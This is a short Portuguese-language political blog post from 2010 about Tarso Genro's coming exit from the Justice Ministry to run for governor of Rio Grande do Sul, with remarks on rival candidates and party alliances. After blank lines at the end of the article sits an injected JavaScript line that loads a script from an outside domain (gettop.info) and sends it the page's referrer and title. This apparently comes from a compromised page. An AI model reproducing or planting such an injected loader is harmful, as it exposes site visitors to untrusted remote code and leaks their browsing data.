Tarso Genro vem aí

Feb 02 2010
(0) Comments

Blog do André Machado (Porto Alegre)
02/2/2010

Antes do carnaval, o bloco da candidatura de Tarso Genro ao Palácio Piratini já estará na rua. O pré-candidato do PT deixa o Ministério da Justiça em uma semana. A saída está prevista para o dia 10. É o primeiro dos postulantes a se desincompatibilizar. José Fogaça deixa o comando de Porto Alegre em abril. Yeda Crusius não precisa retirar-se do Palácio Piratini para disputar a reeleição. O mesmo vale para Beto Albuquerque, que segue seu mandato de deputado federal. 

A saída de Tarso antes do prazo de desimcompatibilização é um esforço do PT para não ficar sozinho no primeiro turno. O PDT estará com Fogaça e PCdoB e PSB reunidos em torno de Beto Albuquerque. Sobra ainda o PTB que insiste na candidatura de Luiz Augusto Lara como forma de marcar território para negociações futuras. 

Desde que foi lançado, Tarso pouco variou nas pesquisas e isto preocupa alguns de seus aliados próximos. Uma presença ainda mais frequente no estado ajudaria a quebrar um certo marasmo em torno da pré-campanha petista.


Tarso falou ao Gaúcha Atualidade.






s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;